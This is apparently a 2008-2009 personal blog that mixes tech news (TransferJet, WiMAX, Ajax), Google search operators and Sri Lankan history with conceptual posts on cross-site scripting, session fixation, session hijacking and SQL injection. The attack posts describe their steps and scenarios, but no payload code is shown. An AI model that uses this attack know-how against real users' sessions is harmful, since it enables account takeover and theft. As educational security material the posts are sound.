websecurities

Transfer JET

2009-04-09T09:24:00.000-07:00

Tokyo, July 17, 2008 - Sony Corporation, Canon Inc., Eastman Kodak Company, Hitachi Ltd., Victor Company of Japan, KDDI Corporation, Kenwood Corporation, Matsushita Electric Industrial Co., Ltd. (Panasonic), Nikon Corporation, Olympus Imaging Corporation, Pioneer Corporation, SAMSUNG ELECTRONICS CO., LTD., Seiko Epson Corporation, Sony Ericsson Mobile Communications, Toshiba Corporation today announced an agreement to form a consortium to develop specifications for interconnecting products using “TransferJet” a new interoperable wireless transfer technology that enables rapid transfer of high resolution video, music and images. The “TransferJet Consortium” (www.transferjet.org) plans to promote a wide range of products and services incorporating TransferJet technology with the aim of accelerating its adoption throughout the consumer electronics industry.

TransferJet wireless technology enables a high speed data transmission rate of 560Mbps, while eliminating the need for complex setup and operation. Directly touching two compliant electronic products together allows files to be transferred automatically, without the need for an access point. For example, touching a TV with a digital camera enables photos to be instantaneously displayed on the TV screen. Alternatively, downloaded music content can be easily enjoyed by touching a mobile phone to a portable audio player. Transfer Jet can be used as a universal interface across all consumer electronics devices.

The “TransferJet Consortium” will develop specifications and guidelines ensuring interoperability between products incorporating the technology, establish licensing schemes and administer the use of the TransferJet logo. The Consortium will also promote the advantages across industries and to consumers. Through these initiatives, the Consortium will aim to create and expand the market for TransferJet products.

Power of google query

2008-10-10T20:36:00.000-07:00

Google query

fallowing shots will show the power of google query..

Google advanced operators help refine searches.
They are included as part of the standard Google Query.
Advanced operators use syntax such as the following:

Operator:search_term

There’s no space between the operator, the colon, and the search term!

intitle: - Search page title
inurl: - Search URL
site: - limit results to a specific site
link: - other sites that link to our subject
inanchor: - search within hyperlinks
filetype: - Starting to see a patern yet?

Advanced Operators: “Filetype:”
–Filetype: extension_type
–Find documents with specified extensions
–The supported extensions are:

HyperText Markup Language (html)
Microsoft PowerPoint (ppt)
Adobe Portable Document Format (pdf)
Microsoft Word (doc)
Adobe PostScript (ps)
Microsoft Works (wks, wps, wdb)
Lotus 1-2-3
(wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Microsoft Excel (xls)
Microsoft Write (wri)
Lotus WordPro (lwp)
Rich Text Format (rtf)
MacWrite (mw)
Shockwave Flash (swf)
Text (ans, txt)

Cross-Site Scripting

2008-08-20T20:27:00.000-07:00

What is XSS?

"XSS", or cross-site scripting, is an attack to other users. It won't give you 'root' or SYSTEM access on a web server. It lives purely on application level (forget about the OSI model for just a minute), so it'll get you some privileges/information about the web application. Nothing more, nothing less.

Roughly speaking, XSS is the ability of injecting HTML tags in the input of a web application. A "web application" can be many things, going from a web based e-mail client to 'online forums' to e-shopping malls. This list is only limited due human creativity.

To give a very basic example, imagine a guestbook where people can discuss what they think about that very website. When viewing a guestbook, a user sees whatever previous users say about this particular website, furthermore sometimes even HTML tags are allowed. Why not putting your text in a red 'comic sans' font, so that your message will be noticed.

This is dangerous.

Power of JAVASCRIPT (try this very funny)

2008-05-23T22:13:00.000-07:00

1. Open Internet Explorer or Firefox

2. Go to Google.com

3. Click images

4. Type "Scooby doo"(or any other keyword).

5. You will get a page which is having full of images

6. Then delete the URL from the address bar and type the following script

i know this code is very long and complex.. but unfortunately blogger ll not allowed to enter this code to post, thats why i use screen shot.. if u really like this please mail me (matildadarini@gmail.com), i ll forward this code.. you not need to type this, only thing is paste the code.. :)

do this,, this is really funnnnnnyyyyy..

7. See the magic of programming

AJAX

2008-04-09T19:07:00.000-07:00

Asynchronous JavaScript And XML

Ajax is a combination of several technologies (JavaScript, XML, HTML and CSS) for creating better, faster, and more interactive web applicationsAsynchronous JavaScript And XML mean: Asynchronous means that when a request is sent, instead of compulsorily waiting till a response comes back, the user still continues working. A function which has been setup will wait for the server’s
response and will react to it JavaScript makes the request to the web server and once a response is returned, JavaScript modifies the current page using its DOM informing the user XML is used to wrap-up the data that is received back from the webserver Ajax was made popular by Google with the introduction of Google
Suggest and Google Maps

How AJAX Works?

Traditional web applications send a request to the web server (using GET or POST method), wait for the server to respond, then a new page will load with the results, thus results in huge overheads With AJAX, JavaScript communicates directly with the server, through the JavaScript XMLHttpRequest object, and gets a response from the server without reloading the web page

Advantages of AJAX

• Interactivity
– Ajax applications can perform number of tasks without having
their performance being limited by Internet bandwidth. This
makes the development of interactive and rich graphic
applications.

• Portability
– Ajax applications are created using existing technologies that are
well implemented by all major browsers and platforms.
Therefore, Ajax applications are cross-platform compliant.

Disadvantages of AJAX

• Usability criticisms
– An Ajax application might behave differently than a classical web
application. E.g.

• Brower’s back button will not guarantee to take the user to the previous instance of the page

• Difficult to bookmark a particular state of the application

• Response time concerns
– Without clear feedback to the user, network latency might result delay in
the interface of the web application something the user might not expect
or understand.

• JavaScript must be enabled
– The browser should support JavaScript and it should be enabled in the
browser.

AJAX TUTORIAL

COMMUNICATION NETWORKS

2008-04-05T00:45:00.000-07:00

The basic issue in communication networks is the transmission of messages to achieve a prescribed message throughput (Quantity of Service) and Quality of Service (QoS). QoS can be specified in terms of message delay, message due dates, bit error rates, packet loss, economic cost of transmission, transmission power,
etc. Depending on QoS, the installation environment, economic considerations, and the application, one of several basic network topologies may be used.

A communication network is composed of nodes, each of which has computing power and can transmit and receive messages over communication links, wireless or cabled. The basic network topologies are shown in the figure and include fully connected, mesh, star, ring, tree, bus. A single network may consist of several interconnected subnets of different topologies.
Networks are further classified as Local Area Networks (LAN), e.g. inside one building, or Wide Area Networks (WAN), e.g. between buildings.

WIMAX

2008-03-11T22:52:00.000-07:00

Worldwide Interoperability for Microwave Access

WIMAX is a telecommunications technology aimed at providing wireless data over long distances in a variety of ways, from point-to-point links to full mobile cellular type access. It is based on the IEEE 802.16 standard, which is also called WirelessMAN. The name WiMAX was created by the WiMAX Forum, which was formed in June 2001 to promote conformance and interoperability of the standard.

Unwired WiMax PC Card

What is WiMAX Forum?
An industry-led, non-profit corporation
formed to promote and certify compatibility and
interoperability of 802.16 broadband wireless products

What is IEEE 802.16 ?
An IEEE Standard for Wireless Metropolitan Area
Networks

Mortivation for 802.16

Cellular & WiFi Backhaul
Broadband on demand
Digital TV
Residential Broadband
Under-served areas
Portable and mobile coverage

Attack process

2008-03-01T01:28:00.001-08:00

Generally, session fixation attack is a three-step process, as shown in fallowing Figure :

1. Session setup:
First, the attacker either sets up a so-called “trap session” on
the target server and obtains that session’s ID, or selects a – usually arbitrary
– session ID to be used in the attack. In some cases, the established trap
session needs to be maintained (kept alive) by repeatedly sending requests
referencing it to avoid idle session timeout.

2. Session fixation:
Next, the attacker needs to introduce her session ID to the
user’s browser, thereby fixing his session.

3. Session entrance:
Finally, the attacker has to wait until the user logs in to
the target server using the previously fixed session ID and then enter the
user’s session.

What is session Hijacking?

2008-03-01T01:24:00.000-08:00

Web-based applications frequently use sessions to provide a friendly environment to their users. HTTP is a stateless protocol, which means that it provides no
integrated way for a web server to maintain states throughout user’s subsequent
requests. In order to overcome this problem, web servers – or sometimes web
applications – implement various kinds of session management. The basic idea behind web session management is that the server generates a session identifier (ID) at some early point in user interaction, sends this ID to the user’s browser and makes sure that this same ID will be sent back by the browser along with each subsequent request. Session IDs thereby become identification tokens for users, and servers can use them to maintain session data (e.g., variables) and create a session-like experience to the users.

There are three widely used methods for maintaining sessions in web environment: URL arguments, hidden form fields and cookies. While each of them has its benefits and shortcomings, cookies have proven to be the most convenient and also the least insecure of the three. From security perspective, most – if not all - known attacks against cookie-based session maintenance schemes can also be used against URL- or hidden form fields-based schemes, while the converse is not true. This makes cookies the best choice security-wise.

Very often, session IDs are not only identification tokens, but also authenticators. This means that upon login, users are authenticated based on their credentials (e.g., usernames/passwords or digital certificates) and issued session IDs that will
effectively serve as temporary static passwords for accessing their sessions.

This makes session IDs a very appealing target for attackers. In many cases, an
attacker who manages to obtain a valid ID of user’s session can use it to directly enter that session – often without arising user’s suspicion. Interestingly, most cross-site scripting proof-of-concept exploits focus on obtaining the session ID stored in browser’s cookie storage. This class of attacks, where the attacker gains access to the user’s session by obtaining his session ID, is called session hijacking.

Web session security is focused on preventing three types of attacks against session IDs: interception, prediction and brute-force attacks. Encrypted communication effectively protects against interception1. Using cryptographically strong pseudorandom number generators and carefully chosen seeds that don’t leak from the server prevents prediction of session IDs. Finally, session IDs are immune to brute-force methods if their effective bit-length is large enough with respect to the number of simultaneous sessions.

Proposals have been made for mitigating the threat of stolen session IDs, and
some products already implement such ideas (e.g., RSA Security’s ACE/Agents for
web servers).

Sri Lankan Heritage

2008-02-18T01:18:00.000-08:00

"SIGIRIYA"

8th wonder of the world

You have all heard about Sigiriya and perhaps you have visited it. It is a small village 10 miles off Dambulla in the district of MAtale. Visitors go there nearly everyday to climb its huge Rock of ancient fame and see the beautiful paintings on a part of its walls as well as the interesting ruins found there.This Rock is very steep and is about 600 feet in height. It was once the fortress of a king of Ceylon who built a city around it and ruled from there for eighteen years.Here is the story of this king.

About fifteen centuries ago King Datusena,the builder of Kalawewa tank, ruled at Anuradhapura.He had two sons,Kasyapa and Moggallana,and a daughter.Kasyapa was however,not born of the queen.His mother was a women of low birth,and Kasyapa therefore had no claim to the throne.Moggallana,on the other hand ,was born of the royal queen and was the rightful heir.The king's daughter married the 'Senapathi'(the Commander in chief of the King's army) but her mother in low was a cruel women and she ill-treated her. When the king heard of this he flew in to such a violent range that he burnt the mother in law alive!.Angered by this
wicked deed,the Senapathi now looked out for a way of revenging himself on the king.Knowing that Kasyapa was displeased with his father, because his low birthprevented him from becoming king after him ,the Senapathi urged him to rebel against the king .Kasyapa redily agreed. He captured his father with the Senapathi's support ,and is said to have stood him up against a wall and buried him alive by plastering him over with clay! He tried to seize his brother ,Moggallana,too and do away with him because he feared that some day Moggallana would make a bid for the throne.but Moggallana was tooo quick for him.He escaped to india.

Kasyapa now placed himself on the throne and ruled at Anoradhapura. His subjects,however,were displeased with him over the foul murder of his father,and he lived in constatnt fear of a rebellion.He also feared that his brother,with an army from India, would invade Ceylon at any moment.So he moved his capital to Sigiriya where,on the top of the Rock,he built himself a large and beautifulpalace.He built a wonderful staircase leading to it through the mouth of a huge lion carved out of stone.He named the Rock "Sinha-giri" or "Sigiri",which means "Lion Rock".Round this he built a moat to protect himself against enemies.
On a side of the royal palace he had a large pond made.Several watch-towers, built on the summit of the Rock,overlooked the surrounding country.

Kasyapa reigned from this Rock fortress for eighteen years until Moggallana came with a powerful army to wage war on him. Instead of waiting for him in his fortress he came down the Rock and bravely rode forth to meet his brother.On the way he came a cross a muddy place and he turned his elephant bach to go along another way.His men,however ,thought that he was turning aside to avoid a battle,and so they fled,leaving him all alone.Feeling ashamed to fall into the hands of his brother,Kasyapa killed himself by cutting his throat with his own sword.

Sigiriya is the World's most beautiflul place ... Give your comments according these shots..

How work CSS

2008-02-15T23:31:00.001-08:00

Have you ever mistyped the address of a web site and received a message like “Error - page name could not be found” or “The page you requested: page name does not exist”? Certainly you have, and odds are you never gave it a second thought; you simply corrected the address or went to a different site altogether. It happens all the time. There are plenty of dead links, or links with typos to stumble upon. However, when you encounter an error message like the two listed above, you are actually witnessing a potential security breach—not necessarily against the site, but rather against you directly.

Suppose you entered the following valid URL:

Notice that "FILENAME.html" is a string that you entered. The web site has included it in the page returned straight through to your browser.

This may seem harmless, but now imagine that you are browsing through auctions on a popular site; let’s call it auctions.example.com. You come across several auctions that someone has posted and would like to see more items that the same person has for sale; let’s assume this person is a “bad guy” (though you don’t know it) and call him BG12345. You click on BG12345’s website and see a listing of his auctions. You click on a link on his page that interests you and are taken to auction.example.com’s site displaying that item. You scroll down to place a bid, and the auction site prompts you for your name and password to sign in. You enter all the information and hit the submit button. Everything looks fine, but in reality, the information that you submit is getting sent back to BG12345. How can this be? The answer is that auction.example.com has what is known as a cross-site scripting (CSS) vulnerability.

A CSS vulnerability is caused by the failure of a site to validate user input before returning it to the client’s web-browser. The essence of cross-site scripting is that an intruder causes a legitimate web server to send a page to a victim's browser that contains malicious script or HTML of the intruder's choosing. The malicious script runs with the privileges of a legitimate script originating from the legitimate web server. The two error messages mentioned earlier could be examples of such a situation. If instead of entering a page name, you entered an HTML or script tag, the server would have returned that command to your browser, as well. Your browser would assume the HTML or script tag was from auction.example.com. It would run the script with the privileges that are set up for that site, and when you looked at the website, everything would appear to be normal.

BG12345 used the same method to deceive you. When you clicked on the link to BG12345’s auction, the link was actually to an invalid page. The link may have looked something like the example below, it used HTML and scripting to mimic the auction site’s page exactly. However, when you clicked submit, it used a form that passed your information back to BG12345. Now BG12345 can access your account, place bids, and change your information. BG12345 can also change your password and lock you out of your own account. Even worse, BG12345 can see the credit card number that you registered with.

So what did BG12345 do? BG12345’s web site offered a link to auction.example.com that looked something like this:
In effect, BG12345 managed to "inject" a JavaScript program into the page returned to you by auction.example.com. The JavaScript ran as though it originated at auction.example.com, and could therefore process events in that document. It also maintained communication with BG12345 by virtue of scripting that BG12345 put in the link; this is the way a CSS vulnerability can be exploited to "sniff" sensitive data from within a web page, including passwords, credit card numbers, and any other arbitrary information you input. There are a number of variants to this problem. Odds are that bank.example.com also has the same vulnerability somewhere on its site. BG12345 could potentially access your bank account and transfer funds using the same process.

No More HACKING..no more

2008-02-03T23:26:00.000-08:00

Hacking hacking hack...

in here im not going to teah you hack.. but i ll give you some technique to prevent hacking attacks. its very difficlut to be a Hacker.tThe peroson who going to be a
hacker should have expert knowledge of atlest one programming language and creative mind.. its better to know hacking type, mostly hacker are used. these things are i got from the internet. the accuracucy may be sure. but it ll give enough idea.

THESE ARE NOT MY INSPIRATION.THANKS FOR EVERY ORIGINAL AUTHORS..

without your article, i cant create this type of blog.

These are the top 10 web hacking technique commonly use

Unvalidated input
Broken access control
Broken authentication and session management
Cross site scripting
Buffer overflows
Injection flaws
Improper error handling
Insecure storage
Denial of service
Insecure configuration management

some of the above are explain in datails

INJECTION FLAWS(SQL INJECTION)

SQL — Structured Query Language — is the language used by software engineers and web developers everywhere to interface web applications with databases. When a web developer uses data from a web form as part of a SQL statement without carefully validating it, there is a reasonable likelihood of a SQL Injection vulnerability.

SQL Injection attacks typically only work against systems where serverside software is constructing strings to build dynamic SQL statements using parameters controlled by an end user. Many database-driven systems utilize stored procedures extensively; depending on how the stored procedures are called, these attacks probably won’t work.

CROSS SITE SCRIPTING

Cross Site Scripting (CSS for short, but sometimes abbreviated as XSS) is one of the most common application level attacks that hackers use to sneak into web applications today. Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site – specifically, impersonate the user. For example, in one audit conducted for a large company it was possible to peek at the user’s credit card number and private information using a CSS attack. This was achieved by running malicious Javascript code at the victim (client) browser, with the “access
privileges” of the web site. These are the very limited Javascript privileges which generally do not let the script access anything but site related information. It should be stressed that although the vulnerability exists at the web site, at no time is the web site directly harmed. Yet this is enough for the script to collect the cookies and send them to the attacker. The result, the attacker gains the cookies
and impersonates the victim.

INPUT VALIDATION

Input validation attacks attempt to submit data which the application does not expect to receive. Normally, an application will perform some type of sanity check on user input. This check tries to ensure that the data is useful. More important checks are necessary to prevent the data from crashing the server. Less stringent checks are required if the data is only to be limited to a specific length.

Imagine the credit card field for an application’s shopping cart. First of all, the credit card number will only consist of digits. Furthermore, most credit card numbers are only 16 digits long, but a few will be less. So, the first validation routine will be a length check. Does the input contain 14 to 16 characters? The second check will be for content. Does the input contain any character that is not a number? We could add another check to the system that determines whether or not the data represents a reasonable credit card number. The value “0000111122223333” is definitely not a credit card number, but what about
“4435786912639983”? A simple function can determine if a 16-character value satisfies the checksum required of valid credit card numbers. Publicly available routines can determine the validity and card type of a 15-character credit card number that starts with a 3 and where the second digit is a 4 or a 7.

Data validation can be complex. The application programmers have to exercise a little prescience to figure out all of the possible values that a user might enter into a form field. We just mentioned three simple checks for credit card validation. These tests can be programmed in JavaScript, placed in theHTMLpage, and served over SSL. But is it secure?

SESSION HAIJACKING

Many web-based applications employ some kind of session management to create a user-friendly environment. Sessions are stored on server and associated with
respective users by session identifiers (IDs). Naturally, session IDs present an
attractive target for attackers, who, by obtaining them, effectively hijack users’
identities. Knowing that, web servers are employing techniques for protecting session IDs from three classes of attacks: interception, prediction and brute-force attacks. In a session fixation attack, the attacker fixes the user’s session ID before the user even logs into the target server, thereby eliminating the need to obtain the user’s session ID afterwards. There are many ways for the attacker to perform a session fixation attack, depending on the session ID transport mechanism (URL arguments, hidden form fields, cookies) and the vulnerabilities available in the target system or its immediate environment. The paper provides detailed information about exploiting vulnerable systems as well as recommendations for protecting them against session fixation attacks.

so.. its enough for today.. i think now you have VERY LITTLE IDEA about what hackers do
at the next i ll tell you another type of hackers technique and, newly trend..

SOMETIMES THIS BLOG LL BE DISSAPEAR AFETR FEW DAYS.. COZ I PUBLISHED HACKERS SECRETS
BUT REMEMBER THERE MUSNT BE ANY SECRET.. WE HAVE TO SHARE OUR KNOWLEDGE TO INTERNET
BECOME BETTER PLACE TO EVERYONE..SO I M WAITING FOR YOU COMMENTS.. USE THIS BLOG TO
SHARE YOUR KNOWLEDGE.. THIS LL HELP TO US KEEP OUR SITE SAFE.. AND ALSO CAUSE TO
IMPROVE OUR KNOWLEDGE..

Cross Site Scripting

2008-02-03T06:03:00.000-08:00